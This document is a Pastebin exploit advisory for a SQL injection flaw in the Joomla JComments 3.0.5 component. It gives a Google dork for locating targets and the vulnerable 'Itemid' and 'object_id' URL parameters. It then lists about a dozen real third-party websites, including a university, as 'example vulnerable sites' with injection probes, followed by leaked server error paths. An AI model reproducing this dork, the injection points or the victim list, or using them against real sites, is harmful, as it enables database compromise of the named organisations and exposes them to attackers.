KingSkrupellos

Joomla JComments Components 3.0.5 SQL Injection

Jan 31st, 2019
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.06 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla JComments Components 3.0.5 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 31/01/2019
  7. # Vendor Homepage : joomlatune.com
  8. # Software Download Link : joomlatune.com/jcomments-downloads.html
  9. # Software Information Link : extensions.joomla.org/extension/jcomments/
  10. # Software Version : 3.0.5
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_jcomments''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20. # Reference Link : cxsecurity.com/issue/WLB-2019010305
  21. packetstormsecurity.com/files/151428/Joomla-JComments-3.0.5-SQL-Injection.html
  22.  
  23. ####################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27. JComments is released under the GNU GPL license and is distributed for free.
  28.  
  29. The JComments is a powerful and easy to use AJAX based comment system
  30.  
  31. for Joomla with flexible ACL, smiles, BBCodes and avatars support.
  32.  
  33. ####################################################################
  34.  
  35. # Impact :
  36. ***********
  37.  
  38. Joomla JComments 3.0.5 component for Joomla! is prone to an SQL-injection vulnerability
  39.  
  40. because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  41.  
  42. Exploiting this issue could allow an attacker to compromise the application,
  43.  
  44. access or modify data, or exploit latent vulnerabilities in the underlying database.
  45.  
  46. ####################################################################
  47.  
  48. # SQL Injection Exploit :
  49. **********************
  50.  
  51. /index.php?option=com_jcomments&Itemid=[SQL Injection]
  52.  
  53. /index.php?option=com_jcomments&task=rss&object_id=[SQL Injection]
  54.  
  55. ####################################################################
  56.  
  57. # Example Vulnerable Sites :
  58. *************************
  59.  
  60. [+] kateb.edu.af/fa/index.php?option=com_jcomments&task=rss&object_id=97%27
  61.  
  62. [+] swalestudio.com/anime/index.php?option=com_jcomments&task=rss&object_id=292%27
  63.  
  64. [+] kok.logipam.com/index.php?option=com_jcomments&Itemid=53%27
  65.  
  66. [+] asesorialogistica.cl/index.php?option=com_jcomments&task=rss&object_id=81%27
  67.  
  68. [+] coin.wne.uw.edu.pl/sledziewska/index.php?option=com_jcomments&task=rss&object_id=1%27
  69.  
  70. [+] mail.villantomagazin.com/regi/index.php?option=com_jcomments&task=rss&object_id=1015%27
  71.  
  72. [+] bunavestirea.md/index.php?option=com_jcomments&Itemid=53%27
  73.  
  74. [+] agrodam.cz/hokej/index.php?option=com_jcomments&task=rss&object_id=108%27
  75.  
  76. [+] giemmefilati.com/arcipelagomuratori/index.php?option=com_jcomments&Itemid=53%27
  77.  
  78. [+] insightitaly.com/index.php?option=com_jcomments&Itemid=127%27
  79.  
  80. [+] prospekt.ee/old/index.php/index.php?option=com_jcomments&task=rss&object_id=8468%27
  81.  
  82. [+] perunaltracitta.org/listadicittadinanza/index.php?option=com_jcomments&task=rss&object_id=938%27
  83.  
  84. ####################################################################
  85.  
  86. # Example SQL Database Error :
  87. ****************************
  88.  
  89. Strict Standards: Non-static method JLoader::import() should not be
  90. called statically in /home1/swalestu/public_html/anime
  91. /libraries/joomla/import.php on line 29
  92.  
  93. Warning: Creating default object from empty value in
  94. /data05/virt18853/domeenid/www.prospekt.ee/htdocs/old/plugins
  95. /system/nonumberelements/helpers/parameters.php on line 130
  96.  
  97. Deprecated: preg_replace(): The /e modifier is deprecated, use
  98. preg_replace_callback instead in /data05/virt18853/domeenid
  99. /www.prospekt.ee/htdocs/old/libraries/joomla/filter/
  100. filterinput.php on line 501
  101.  
  102. ####################################################################
  103.  
  104. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  105.  
  106. ####################################################################
Add Comment
Please, Sign In to add comment